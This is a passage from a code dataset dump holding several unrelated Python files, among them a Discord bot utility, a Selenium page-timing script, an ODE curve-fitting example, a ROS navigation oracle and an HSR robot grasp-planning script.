activation='sigmoid'))\n\n\n\n\nif __name__ == \"__main__\":\n wti, kau = data_from_csv()\n elec = data_from_xls()\n data = struct_data(wti, elec, kau)\n","repo_name":"2020-SKKU-S-HERO/mobius_adaptation","sub_path":"database/price_pred_model.py","file_name":"price_pred_model.py","file_ext":"py","file_size_in_byte":4005,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"18252264290","text":"import discord\nimport json\nfrom load_config import load_config\n\nclass Utilies():\n def __init__(self, bot):\n self.bot = bot\n \n async def id_check(self, interaction:discord.Interaction):\n data = load_config()\n if str(interaction.user.id) not in data.owner_ids:\n return False\n else:\n return True\n \n async def save_ids(self, msg_id, chnl_id):\n with open(\"assets/config.json\", \"r\") as f:\n data = json.load(f)\n\n data[\"categories\"][\"channel_id\"] = str(chnl_id)\n data[\"categories\"][\"message_id\"] = str(msg_id)\n\n with open(\"assets/config.json\", \"w\") as f:\n json.dump(data, f, indent=4)\n \n async def user_to_id(self, chnl):\n with open('assets/tickets.json', 'r') as f:\n data = json.load(f)\n \n for value in data.values():\n if value.get('channel_id') == chnl:\n user = value.get('author')\n return user\n\n return None\n","repo_name":"FlickNoJutsu/pyticketbot","sub_path":"core/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1012,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"15191062955","text":"from selenium import webdriver\r\n# This is a relatively simple response time tester that uses Selenium to retrieve both front and back end response times\r\n# Chrome web driver interface\r\n\r\nPATH = r\"Your chromedriver.exe location\"\r\nhyperlink = \"Whatever site you want to test the response times of\"\r\ndriver = webdriver.Chrome(PATH)\r\ndriver.get(hyperlink)\r\n\r\n# Use Navigation Timing API to calculate the timings that matter the most\r\n\r\nnavigationStart = driver.execute_script(\"return window.performance.timing.navigationStart\")\r\nresponseStart = driver.execute_script(\"return window.performance.timing.responseStart\")\r\ndomComplete = driver.execute_script(\"return window.performance.timing.domComplete\")\r\n\r\n# Calculate the performance\r\nbackendPerformance_calc = responseStart - navigationStart\r\nfrontendPerformance_calc = domComplete - responseStart\r\n\r\nprint(\"Back End: %s\" % backendPerformance_calc + \"ms\")\r\nprint(\"Front End: %s\" % frontendPerformance_calc + \"ms\")\r\n\r\ndriver.quit()","repo_name":"tdotmich/Automation","sub_path":"NavigationTestGit.py","file_name":"NavigationTestGit.py","file_ext":"py","file_size_in_byte":977,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"7262957831","text":"# %% [markdown]\n#\n# This example shows how to use `CompositeExpr` to create a custom numerical expression which can\n# be used in slimfit fitting.\n#\n# In this particular example we fit data to a dampened harmonic oscillator, where the time-evolution\n# of the system is solved by `scipy.integrate.solve_ivp`.\n\nfrom __future__ import annotations\n\nimport numpy as np\nimport proplot as pplt\nfrom scipy.integrate import solve_ivp\nfrom sympy import Symbol, Expr, symbols\n\nfrom slimfit import Model, Parameters\nfrom slimfit.fit import Fit\nfrom slimfit.numerical import NumExpr, to_numerical\nfrom slimfit.base import CompositeExpr\n\n\n# %%\n\n# %% [markdown]\n#\n# Generate the GT data to fit the damped harmonic oscillator to, and add some noise.\n\n\ndef ode(x, y):\n return np.sin(2 * np.pi * 0.2 * x) * np.exp(-0.1 * x)\n\n\nnum = 100\nt_eval = np.linspace(0.0, 25, num=num, endpoint=True)\nsol = solve_ivp(ode, (0.0, 25), np.array([-1]), t_eval=t_eval)\n\nydata = sol.y + np.random.normal(0, 0.05, size=num)\ndata = {\"y\": ydata, \"t\": t_eval}\n\n# %%\n\n# %% [markdown]\n#\n# `CompositeExpr` can be subclassed to create a custom numerical expression. The subclass must\n# implement the `__call__` method, which returns a (dictionary of) the numerical values of the\n# expression. In this example, we use `solve_ivp` to solve the ODE, and return the solution at the\n# specified time points.\n#\n# Because the `__init__` method takes an additional `domain` argument, the `to_numerical` method\n# must also be implemented correctly.\n\n\nclass IVPNumExpr(CompositeExpr):\n def __init__(\n self,\n t: Symbol | NumExpr | Expr,\n freq: Symbol | NumExpr | Expr,\n damping: Symbol | NumExpr | Expr,\n y0: Symbol | NumExpr | Expr,\n domain: tuple[float, float],\n ):\n expr = {\"t\": t, \"freq\": freq, \"damping\": damping, \"y0\": y0}\n self.domain = domain\n super().__init__(expr)\n\n def __call__(self, *args, **kwargs) -> np.ndarray:\n result = super().__call__(**kwargs)\n\n sol = solve_ivp(\n self.grad_func,\n self.domain,\n np.array([result[\"y0\"]]),\n t_eval=result[\"t\"],\n args=(result[\"freq\"], result[\"damping\"]),\n )\n\n return sol.y\n\n def to_numerical(self):\n num_expr = {k: to_numerical(expr) for k, expr in self.items()}\n instance = IVPNumExpr(**num_expr, domain=self.domain)\n\n return instance\n\n @staticmethod\n def grad_func(x, y, freq, damping):\n return np.sin(2 * np.pi * freq * x) * np.exp(-damping * x)\n\n\n# %%\n\n# %% [markdown]\n#\n# The resulting class can now be used in slimfit fitting, taking any symbol or expr as arguments for\n# the args `t, f, d, y0`, or it can be embedded in a larger model.\n\nt, f, d, y0, y = symbols(\"t f d y0 y\")\nivp = IVPNumExpr(t, f, d, y0, domain=(0.0, 25.0))\n\nmodel = Model({y: ivp})\n\n# Fix frequency at GT value to ensure fit converges\nguess = {\"f\": 0.2, \"d\": 0.5, \"y0\": -1.0}\nparameters = Parameters.from_symbols(ivp.symbols, guess).replace(\"f\", fixed=True)\n\nfit = Fit(model, parameters, data)\nresult = fit.execute()\n\nprint(result.parameters)\n\n# %%\n\nfig, ax = pplt.subplots()\nax.scatter(t_eval, ydata.flatten())\nax.plot(t_eval, ivp(t=t_eval, **parameters.guess).T, color=\"r\")\nax.plot(t_eval, ivp(t=t_eval, **result.parameters).T, color=\"k\")\npplt.show()\n","repo_name":"Jhsmit/slimfit","sub_path":"docs/examples/custom_numexpr_ivp.py","file_name":"custom_numexpr_ivp.py","file_ext":"py","file_size_in_byte":3320,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"25798884442","text":"'''\n1\n5 3\n0 0 1 1 1\n1 1 1 1 0\n0 0 1 0 0\n0 1 1 1 1\n1 1 1 0 1\n'''\ndef puzzle_count(matrix, target_num) :\n total_sum_list = []\n for row in matrix:\n total_sum = 0\n for i in range(n):\n if row[i] == 1:\n total_sum += 1\n else:\n total_sum_list.append(total_sum)\n total_sum = 0\n\n total_sum_list.append(total_sum)\n return total_sum_list.count(target_num)\n\nt = int(input())\nfor case in range(1,t+1):\n n,k = map(int, input().split())\n matrix = [list(map(int, input().split())) for _ in range(n)]\n result = puzzle_count(matrix,k) + puzzle_count(list(zip(*matrix[::-1])),k)\n\n print(f'#{case}', result)","repo_name":"00purplecandy00/Algorithm-Test-03","sub_path":"2200072/어디에단어가들어갈수있을까.py","file_name":"어디에단어가들어갈수있을까.py","file_ext":"py","file_size_in_byte":649,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"36"} +{"seq_id":"19725076852","text":"\"\"\"\n \t*************************** \n \t--------EveIDE_LIGHT-------- \n \t Author: Adancurusul\n \t Date: 2021-07-15 09:04:18\n \t LastEditors: Adancurusul\n \t LastEditTime: 2021-07-31 14:08:49\n \t Github: https://github.com/Adancurusul\n \t Email: adancurusul@gmail.com\n\n \t***************************\n \"\"\"\nimport re\n\nrgl_exp1 = r''' \n ((VOID)|(void)|(char)|(short)|(int)|(float)|(long)|(double)) # 识别函数返回值类型\n (\\s*(\\*)?\\s*) # 识别返回值是否为指针类型以及中间是否包含空格\n (\\w+) # 识别函数名\n ((\\s*)(\\()(\\n)?) # 函数开始小括号\n ((\\s*)?(const)?(\\s*)? # 参数前是否有const\n ((void)|(char)|(short)|(int)|(float)|(long)|(double))? # 参数类型\n (\\s*)(\\*)?(\\s*)?(restrict)?(\\s*)?(\\w+)(\\s*)?(\\,)?(\\n)?(.*)?)?# 最后的*表示有多个参数\n ((\\s*)(\\))(\\n)?) # 函数结束小括号\n '''\n\nrgl_exp12 = r''' \n ((VOID)|(void)|(char)|(short)|(int)|(float)|(long)|(double)) # 识别函数返回值类型\n (\\s*(\\*)?\\s*) # 识别返回值是否为指针类型以及中间是否包含空格\n (\\w+) # 识别函数名\n ((\\s*)(\\()(\\n)?) # 函数开始小括号\n (?P(.+)?)\n ((\\s*)(\\))(\\n)?) # 函数结束小括号\n ((\\s*)(\\{)(\\n)?)\n '''\ncompileStrA = r'((VOID)|(void)|(char)|(short)|(int)|(float)|(long)|(double))(\\s*(\\*)?\\s*)(\\w+)((\\s*)(\\()(\\n)?)(.+)?((\\s*)(\\))(\\n)?)((\\s*)(\\{)(\\n)?)'\ncompileStrB = r\"((VOID)|(void)|(char)|(short)|(int)|(float)|(long)|(double))(\\s*(\\*)?\\s*)(\\w+)((\\s*)(\\()(\\n)?)((\\s*)?(const)?(\\s*)?((void)|(char)|(short)|(int)|(float)|(long)|(double))?(\\s*)(\\*)?(\\s*)?(restrict)?(\\s*)?(\\w+)(\\s*)?(\\,)?(\\n)?(.*)?)?((\\s*)(\\))(\\n)?)\"\ndef get1stSymPos( s, fromPos=0):\n g_DictSymbols = {'\"': '\"', '/*': '*/', '//': '\\n'}\n listPos = [] # 位置,符号\n for b in g_DictSymbols: \n pos = s.find(b, fromPos)\n listPos.append((pos, b)) # 插入位置以及结束符号\n minIndex = -1 # 最小位置在listPos中的索引\n index = 0 # 索引\n while index < len(listPos):\n pos = listPos[index][0] # 位置\n if minIndex < 0 and pos >= 0: # 第一个非负位置\n minIndex = index\n if 0 <= pos < listPos[minIndex][0]: # 后面出现的更靠前的位置\n minIndex = index\n index = index + 1\n if minIndex == -1: # 没找到\n return (-1, None)\n else:\n return (listPos[minIndex])\n\ndef rmCommentsInCFile(s):\n g_DictSymbols = {'\"': '\"', '/*': '*/', '//': '\\n'}\n\n if not isinstance(s, str):\n raise TypeError(s)\n fromPos = 0\n while (fromPos < len(s)):\n result = get1stSymPos(s, fromPos)\n\n if result[0] == -1: # 没有符号了\n return s\n else:\n endPos = s.find(g_DictSymbols[result[1]], result[0] + len(result[1]))\n if result[1] == '//': # 单行注释\n if endPos == -1: # 没有换行符也可以\n endPos = len(s)\n s = s.replace(s[result[0]:endPos], ' ', 1)\n fromPos = result[0]\n elif result[1] == '/*': # 区块注释\n if endPos == -1: # 没有结束符就报错\n raise ValueError(\"块状注释未闭合\")\n s = s.replace(s[result[0]:endPos + 2], ' ', 1)\n fromPos = result[0]\n else: # 字符串\n if endPos == -1: # 没有结束符就报错\n raise ValueError(\"符号未闭合\")\n fromPos = endPos + len(g_DictSymbols[result[1]])\n return s\nif __name__ == \"__main__\":\n code = \"\"\"\nvoid FuncName(int param1,char param2, int *param3, double *parma4){\n printf(\"hello world!\\n\");\n}\n \"\"\"\n filePath =r\"C:\\Users\\User\\Documents\\GitHub\\EveIDE_Plus\\source\\t_workspace\\t_exCpro\\main.c\"\n with open(filePath,'r')as r:\n code0 = r.read()\n code0 = rmCommentsInCFile(code0)\n\n pat1 = re.compile(compileStrA, re.X)\n ret = pat1.findall(code0)\n if ret:\n for ea in ret:\n print(ea[11])\n #print(code)\n '''cl = code.split(\";\")\n\n for e in cl:\n print(e)\n ret = pat1.search(e)\n if None == ret:\n pass\n #print('不包含C函数定义!')\n else:\n #for eachIndex in range(len(ret.group())):\n print(\"定义\"+str(ret))\n #print(ret.group())'''\n\n","repo_name":"Adancurusul/EveIDE_LIGHT","sub_path":"source/t_file.py","file_name":"t_file.py","file_ext":"py","file_size_in_byte":4900,"program_lang":"python","lang":"zh","doc_type":"code","stars":50,"dataset":"github-code","pt":"36"} +{"seq_id":"7227331574","text":"from collections import defaultdict, deque, namedtuple\nfrom pathlib import Path\nfrom statistics import median\nfrom typing import Iterator\n\nfrom utils import get_neighbors_n_dimensional, read_trimmed\n\n\nclass DictLike:\n def __getitem__(self, item):\n return getattr(self, item)\n\n def __setitem__(self, key, value):\n setattr(self, key, value)\n\n\nclass Point(DictLike):\n def __init__(self, x, y):\n self.x, self.y = x, y\n\n def __hash__(self):\n return hash((self.x, self.y))\n\n def __eq__(self, other):\n return self.x == other.x and self.y == other.y\n\n def __repr__(self) -> str:\n return f\"({self.x}, {self.y})\"\n\n def fold(self, axis, line):\n if self[axis] > line:\n self[axis] = 2 * line - self[axis]\n return self\n\n\ndef q1(dots, folds):\n axis, line = folds[0]\n for dot in dots.copy():\n if axis == \"x\":\n if dot.x > line:\n dots.remove(dot)\n dots.add(Point(2 * line - dot.x, dot.y))\n return len(dots)\n\n\ndef print_dots(dots):\n x_max = max(dot.x for dot in dots)\n y_max = max(dot.y for dot in dots)\n grid = [[\" \" for _ in range(x_max + 1)] for _ in range(y_max + 1)]\n for dot in dots:\n grid[dot.y][dot.x] = \"*\"\n for row in grid:\n print(\"\".join(row))\n\n\ndef q2(dots, folds):\n for axis, line in folds:\n # If edited in place, duplicates aren't removed *shrug*\n dots = {d.fold(axis, line) for d in dots}\n print_dots(dots)\n return len(dots)\n\n\ndef parse_dots(values):\n for v in values:\n dot = v.split(\",\")\n if len(dot) == 2:\n yield Point(int(dot[0]), int(dot[1]))\n\n\ndef parse_folds(values):\n for v in values:\n if len(v.split(\" \")) == 3:\n fold = v.split(\" \")[2]\n yield fold.split(\"=\")[0], int(fold.split(\"=\")[1])\n\n\ndef main():\n filename = \"./13.txt\"\n values = read_trimmed(filename)\n dots = set(parse_dots(values))\n folds = [*parse_folds(values)]\n print(q1(dots, folds))\n\n values = read_trimmed(filename)\n dots = set(parse_dots(values))\n folds = [*parse_folds(values)]\n print(q2(dots, folds))\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"blomejd/advent_of_code_2021","sub_path":"advent_2021/13.py","file_name":"13.py","file_ext":"py","file_size_in_byte":2195,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"2884716529","text":"# coding:utf-8\n# @Time : 2019-09-11 11:02\n# @Author: Xiawang\n# Description:\nfrom flask_restful import Resource, reqparse\n\nfrom backend.common.extensions import convert_json\nfrom backend.common.new_models import User, TestSheet\nfrom backend.common.response_structure import ResponseStructure\nfrom backend.common.state import Results, ResponseCode\n\n\nclass MyTestSheets(Resource):\n\n def get(self):\n parser = reqparse.RequestParser()\n parser.add_argument('TOKEN', type=str, location='headers')\n args = parser.parse_args()\n user = User.verify_auth_token(args['TOKEN'])\n if not user:\n return Results().get(ResponseCode.FAIL_LOGIN_AUTH)\n results = TestSheet.get_or_none(TestSheet.qa_id == user.id, TestSheet.status=='待部署')\n if results is None:\n return Results().get(ResponseCode.SUCCESS)\n result_data = Results().set_data()\n results = TestSheet.select().where(TestSheet.qa_id == user.id, TestSheet.status == '待部署').order_by(\n TestSheet.create_time.desc())\n\n for result in results:\n testsheet_data = convert_json(TestSheet, result.id)\n ResponseStructure().set_username(data=testsheet_data, id=testsheet_data['qa_id'],\n user='qa_name')\n ResponseStructure().set_username(data=testsheet_data, id=testsheet_data['backend_id'],\n user='backend_name')\n ResponseStructure().set_username(data=testsheet_data, id=testsheet_data['front_id'], user='front_name')\n result_data.append(testsheet_data)\n\n return Results().get(ResponseCode.SUCCESS, data=result_data)\n","repo_name":"Ariaxie-1985/aria","sub_path":"backend/resources/spring/my_testsheets.py","file_name":"my_testsheets.py","file_ext":"py","file_size_in_byte":1710,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"34073036518","text":"__author__ = 'Hamilton Kibbe '\n__version__ = '1.0'\n\n\n\n\nMETADATA = {\n 'name': 'pyableton',\n 'version': __version__,\n 'url': 'https://github.com/hamiltonkibbe/PyAbleton',\n 'packages': ['pyableton'],\n 'package_data': {'presets': ['presets/res/*']},\n 'author': 'Hamilton Kibbe',\n 'author_email': 'ham@hamiltonkib.be',\n 'description': 'A library for creating/editing Ableton Live presets',\n 'license': 'MIT License'\n}\n\nSETUPTOOLS_METADATA = {\n 'install_requires':['setuptools','bs4'],\n 'include_package_data': True\n}\n\ndef install():\n \"\"\" Install using setuptools, fallback to distutils\n \"\"\"\n try:\n from setuptools import setup\n METADATA.update(SETUPTOOLS_METADATA)\n setup(**METADATA)\n except ImportError:\n from sys import stderr\n stderr.write('Could not import setuptools, using distutils')\n stderr.write('NOTE: You will need to install dependencies manualy')\n from distutils.core import setup\n setup(**METADATA)\n\nif __name__ == '__main__':\n install()\n\n","repo_name":"hamiltonkibbe/PyAbleton","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1072,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"36"} +{"seq_id":"18962034242","text":"import os\nimport math\nimport string\n\ninput_file = open(\"input.txt\", \"r\")\n\ncounter = 0\n\nfor line in input_file:\n g1, g2 = line.strip().split(\",\")\n g1a, g1b = g1.split(\"-\")\n g2a, g2b = g2.split(\"-\")\n s1 = set(range(int(g1a), int(g1b) + 1))\n s2 = set(range(int(g2a), int(g2b) + 1))\n\n if(s1.issubset(s2) or s2.issubset(s1)):\n counter += 1\n\n\nprint(counter)","repo_name":"rgvillanueva28/advent-of-code-2022","sub_path":"Day 4 - Camp Cleanup/Part 1.py","file_name":"Part 1.py","file_ext":"py","file_size_in_byte":376,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"36"} +{"seq_id":"16679927011","text":"from src.modal.Stl import Stl\nfrom src.modal.Hsteel import Hsteel\nfrom src.algorithm.HsteelAnalysis import HsteelAnalysis\n\nfrom matplotlib import pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom matplotlib import cm\nimport argparse\nimport csv\nimport os\nimport copy\nfrom os import listdir\nfrom os.path import isfile, join\n\nfrom stl import mesh\nimport stl, numpy\nimport time\n\ndef getAllPosAssociation(allPosAttr):\n posAttr = []\n\n for item in allPosAttr:\n for cThick in item[3]:\n for tbThick in item[4]:\n value = [item[0], item[1], item[2], cThick, tbThick]\n posAttr.append(value)\n\n return posAttr\n\ndef main(args):\n stlName = args.name\n stlPath = 'stl/' + stlName\n\n paintOrder = [\n [0, 1, 2],\n [3, 4, 5],\n [6],\n [7],\n ]\n\n # Stl Obj\n stlObj = Stl()\n posHsteelAttr = stlObj.getAllPossibleHsteelAttr(stlPath)\n posHsteelAttr = getAllPosAssociation(posHsteelAttr)\n\n # Hsteel Attr Analysis\n hsteelAnalysis = HsteelAnalysis()\n hsteelConfig = hsteelAnalysis.getMostSimilarConfig(posHsteelAttr)\n for p in hsteelConfig[:5]:\n print(p)\n\n # Hsteel Painting\n fig = plt.figure()\n ax = fig.gca(projection='3d')\n\n hsteelPaint = Hsteel(ax)\n if len(hsteelConfig) > 0:\n print('Similar Result....')\n print(hsteelConfig[0]['config'])\n \n maxLength = 2000\n\n length = hsteelConfig[0]['config']['length']\n paintPoints = []\n # if length < maxLength: maxLength = length\n paintPoint = hsteelPaint.startPaint3dModal(hsteelConfig[0]['config'], length, paintOrder[args.paintMode], args.paintLength)\n lengthTimes = int(length / maxLength)\n for time in range(0, lengthTimes):\n for p in copy.deepcopy(paintPoint):\n if p[1] != -1: p[1] += maxLength * time\n paintPoints.append(p)\n if length % maxLength != 0:\n paintPoint = hsteelPaint.startPaint3dModal(hsteelConfig[0]['config'], length % maxLength, paintOrder[args.paintMode], args.paintLength)\n for p in copy.deepcopy(paintPoint):\n if p[1] != -1: p[1] += length - (length % maxLength)\n paintPoints.append(p)\n\n writeRouteToFile(paintPoints)\n plt.show()\n\ndef checkAllStlConfig():\n stlfiles = [f for f in listdir('stl') if isfile(join('stl', f))]\n \n # Init\n stlObj = Stl()\n hsteelAnalysis = HsteelAnalysis()\n for stlName in stlfiles:\n startTime = time.time()\n print('File ', stlName, ' is checking.....')\n stlPath = 'stl/' + stlName\n\n posHsteelAttr = stlObj.getAllPossibleHsteelAttr(stlPath)\n posHsteelAttr = getAllPosAssociation(posHsteelAttr)\n\n hsteelConfig = hsteelAnalysis.getMostSimilarConfig(posHsteelAttr)\n\n if len(hsteelConfig) > 0:\n similarConfig = hsteelConfig[0]\n record = [\n stlName,\n similarConfig['sameNum'],\n similarConfig['distance'],\n similarConfig['config']['length'],\n similarConfig['config']['height'],\n similarConfig['config']['width'],\n similarConfig['config']['cThick'],\n similarConfig['config']['tbThick'],\n (time.time() - startTime)\n ]\n else:\n record = [stlName, -1, -1, -1, -1, -1, -1, -1, -1]\n writeRecordToFile(record)\n\n print('Finished...')\n\ndef writeRecordToFile(args):\n with open('./src/output/stl_record.csv', 'a', newline='') as csvfile:\n writer = csv.writer(csvfile)\n\n data = [d for d in args]\n writer.writerow(data)\n\ndef writeRouteToFile(route):\n with open('./src/output/route.csv', 'a', newline='') as csvfile:\n csvfile.truncate(0)\n writer = csv.writer(csvfile)\n for i in route:\n if i[1] == -1: continue\n writer.writerow(i)\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument('--name', '-n', default='H-900x300x14x28x2600.stl', type=str)\n parser.add_argument('--paintMode', '-m', default=4, type=int)\n parser.add_argument('--paintLength', '-l', default=125, type=int)\n parser.add_argument('--runall', '-r', default=False, type=bool)\n\n args = parser.parse_args()\n \n if args.runall: checkAllStlConfig()\n else: main(args)","repo_name":"discreet0303/h-steel-route-plan","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4393,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"6260376001","text":"import pytest\nimport logging\nfrom .settings import CLIENT_CONF, DB_CONF\nfrom arango import ArangoClient\n\n\n#\n# Logging\n#\nLOG_LEVELS = {\n 'graphene-arango': logging.DEBUG,\n 'requests': logging.WARN,\n 'urllib3': logging.WARN,\n}\nlogging.basicConfig(level=LOG_LEVELS['graphene-arango'])\nfor litem in LOG_LEVELS.keys():\n logging.getLogger(litem).setLevel(LOG_LEVELS[litem])\n\n\ndef _test_db():\n cli = ArangoClient(**CLIENT_CONF)\n return cli.db(**DB_CONF)\n\n\n@pytest.fixture(scope=\"session\")\ndef test_db():\n # cli = ArangoClient(**CLIENT_CONF)\n yield _test_db()\n\n\n@pytest.fixture(scope=\"session\")\ndef cleanup(test_db):\n yield\n assert test_db.delete_collection('people')\n","repo_name":"riverfr0zen/graphene-arango","sub_path":"graphene_arango/tests/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":690,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"71197249383","text":"#!/usr/bin/env python\n\nimport rospy\nimport sys\nfrom move_base_msgs.msg import *\nfrom geometry_msgs.msg import PoseStamped\n\n\ndef has_reached_goal(data):\n goal_status = data.status.text\n rospy.loginfo(goal_status)\n if goal_status == \"Goal reached.\":\n return True\n else:\n return False\n\n\ndef respond_move_base_result(x, y):\n msg_result = rospy.wait_for_message(\"/robot_0/move_base/result\", MoveBaseActionResult)\n if has_reached_goal(msg_result):\n rospy.loginfo(\"Point x: %f y: %f reached successfully\", x, y)\n sys.exit(0) # success\n else:\n rospy.loginfo(\"Did not reach point x: %f y: %f\", x, y)\n sys.exit(1) # fail\n\n\ndef respond_goal_success(data, expected_x, expected_y):\n x = float(data.pose.position.x)\n y = float(data.pose.position.y)\n rospy.loginfo('Checking goal status X: %f Y: %f', x, y)\n\n if expected_x - 0.1 <= x <= expected_x + 0.1 and expected_y - 0.1 <= y <= expected_y + 0.1:\n respond_move_base_result(x, y)\n else:\n rospy.loginfo(\"Waiting for a next goal\")\n\n\ndef oracle():\n rospy.init_node('oracle', anonymous=True)\n rospy.loginfo(\"Starting oracle ...\")\n rate = rospy.Rate(2)\n\n x, y = list(map(float, sys.argv[1:3]))\n\n while not rospy.is_shutdown():\n rospy.loginfo(\"Waiting for goal ...\")\n pose = rospy.wait_for_message(\"/robot_0/move_base_node/current_goal\", PoseStamped)\n respond_goal_success(pose, x, y)\n rate.sleep()\n\n\nif __name__ == '__main__':\n oracle()\n","repo_name":"ingmarliibert/testit-patrol-learn","sub_path":"testit_patrol_learn/testit_tests/tests/01/oracle/oracle.py","file_name":"oracle.py","file_ext":"py","file_size_in_byte":1510,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"32808873641","text":"# !/usr/bin/env python\nfrom __future__ import print_function, division\n\nfrom time import time, sleep\nimport signal\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nimport rospy\nimport pyexotica as exo\nfrom pyexotica.publish_trajectory import *\n\nimport hsrb_exotica_python_script\n\ndef start_aico():\n do_plot = True\n traj_version = -1\n\n use_screenshot = False\n # ffmpeg -r 50 -f image2 -s 1920x1080 -i ./hsr_driveby_visualisation_%03d.png -vcodec libx264 -pix_fmt yuv420p ./output.mp4\n screenshot = lambda *args: None\n if use_screenshot:\n from jsk_rviz_plugins.srv import Screenshot, ScreenshotRequest, ScreenshotResponse\n rospy.wait_for_service('/rviz/screenshot')\n screenshot = rospy.ServiceProxy('/rviz/screenshot', Screenshot)\n\n exo.Setup.init_ros()\n # config_name = '{hsr_driveby_full}/resources/hsr_meeting_room_table_aico_new.xml'\n config_name = '{hsr_driveby_full}/resources/hsr_meeting_room_table_aico.xml'\n solver = exo.Setup.load_solver(config_name)\n problem = solver.get_problem()\n scene = problem.get_scene()\n kt = scene.get_kinematic_tree()\n joint_limits = problem.get_scene().get_kinematic_tree().get_joint_limits()\n\n # Set target for soda can\n scene.attach_object(\"SodaCan\", \"TargetObject\")\n #scene.attach_object_local(\"TargetObject\", \"Table\", exo.KDLFrame([0.2,0.30,0.06+0.04]))\n #added offset to the y coordinate since planning and simulation grasp objects have different geometry.\n # bottle on right hand side\n # \n scene.attach_object_local(\"TargetObject\", \"Table\", exo.KDLFrame([0.2,0.30,0.06]))#+0.04]))\n # bottle on left hand side\n scene.attach_object_local(\"TargetObject\", \"Table\", exo.KDLFrame([0.2,0.30,0.06]))#+0.04]))\n\n # Move robot to start state\n x_start = problem.start_state\n x_start[0] = 0\n x_start[1] = 0\n x_start[2]= 0\n # x_start[2] = -np.pi/2.\n problem.start_state = x_start\n scene.set_model_state(problem.start_state)\n #scene.set_model_state_map({'hand_motor_joint': 0.7, 'hand_l_spring_proximal_joint':0.9, 'hand_l_distal_joint': -0.6, 'hand_r_spring_proximal_joint':0.9, 'hand_r_distal_joint': -0.6, 'wrist_roll_joint': -1.})\n #set to move to go, assuming robot is already moving\n # \n # scene.set_model_state_map({'hand_motor_joint': 0.7, 'hand_l_spring_proximal_joint':0.9, 'hand_l_distal_joint': -0.6, 'hand_r_spring_proximal_joint':0.9, 'hand_r_distal_joint': -0.6, 'wrist_roll_joint': 0, 'wrist_flex_joint': -np.pi/2, 'arm_roll_joint': -np.pi/2})\n scene.set_model_state_map({'hand_motor_joint': 0.7, 'hand_l_spring_proximal_joint':0.9, 'hand_l_distal_joint': -0.6, 'hand_r_spring_proximal_joint':0.9, 'hand_r_distal_joint': -0.6, 'wrist_roll_joint': 0, 'wrist_flex_joint': -np.pi/2, 'arm_roll_joint': 0})\n problem.start_state = scene.get_model_state()\n q_start = problem.apply_start_state(True)\n q_start = np.clip(q_start, joint_limits[:,0], joint_limits[:,1])\n problem.update(q_start, 0)\n problem.start_state = scene.get_model_state()\n q_start = problem.apply_start_state(True)\n if np.any(q_start < joint_limits[:,0]) or np.any(q_start > joint_limits[:,1]):\n raise RuntimeError(\"Start state exceeds joint limits!\")\n\n mug_location = scene.fk('SodaCan', exo.KDLFrame(), '', exo.KDLFrame()).get_translation_and_rpy()\n\n # t_grasp_begin = 3.5 #4.2\n t_grasp_begin = 4.5\n t_grasp_duration = 0.5\n T_grasp_begin = int(t_grasp_begin / problem.tau)\n T_grasp_end = int((t_grasp_begin + t_grasp_duration) / problem.tau)\n\n # The target position needs to be reached during the grasping period\n problem.set_rho('Position', 0, 0)\n for t in range(T_grasp_begin, T_grasp_end):\n problem.set_rho('Position', 1e4, t)\n problem.set_goal('Position', mug_location[:3], t)\n\n # The HSR has a poor reachability, so we deactivate the base tracking here\n # problem.set_rho('BasePosition', 0, t)\n\n # Height above the table before and after grasp\n problem.set_rho('LiftOffTable', 1e2, T_grasp_begin - 20)\n # problem.set_rho('LiftOffTable', 1e3, T_grasp_end + 5)\n # problem.set_rho('LiftOffTable', 1e4, T_grasp_end + 10)\n problem.set_rho('LiftOffTable', 1e2, T_grasp_end + 20)\n\n\n # The axis needs to be fixed from the beginning of the grasp to the end of the motion\n for t in range(T_grasp_begin, problem.T):\n #problem.set_rho('AxisAlignment', 1e4, t)\n problem.set_rho('AxisAlignment', 1e2, t)\n\n problem.set_rho('BaseOrientation', 1e2, -1)\n\n # Initial trajectory = zero motion\n zero_motion = np.zeros((problem.T,problem.N))\n for t in range(problem.T):\n zero_motion[t,:] = q_start\n problem.initial_trajectory = zero_motion\n\n solution = solver.solve()\n print(\"Solved in\", solver.get_planning_time(), \"final cost\", problem.get_cost_evolution()[1][-1])\n # '''\n # Show convergence plot\n fig = plt.figure(1)\n plt.plot(problem.get_cost_evolution()[0], problem.get_cost_evolution()[1])\n plt.yscale('log')\n plt.ylabel('Cost')\n plt.xlabel('Time (s)')\n plt.xlim(0,np.max(problem.get_cost_evolution()[0]))\n plt.title('Convergence')\n\n # Show cost breakdown\n fig = plt.figure(2)\n # '''\n if do_plot:\n costs = {}\n ct = 1.0 / problem.tau / problem.T\n for t in range(problem.T):\n problem.update(solution[t,:],t)\n for cost_task in problem.cost.indexing:\n task = problem.cost.tasks[cost_task.id]\n task_name = task.name\n task_id = task.id\n costs[task_name] = np.zeros((problem.T,))\n # print(task_id, task_name, task, cost_task.start, cost_task.length, cost_task.startJ, 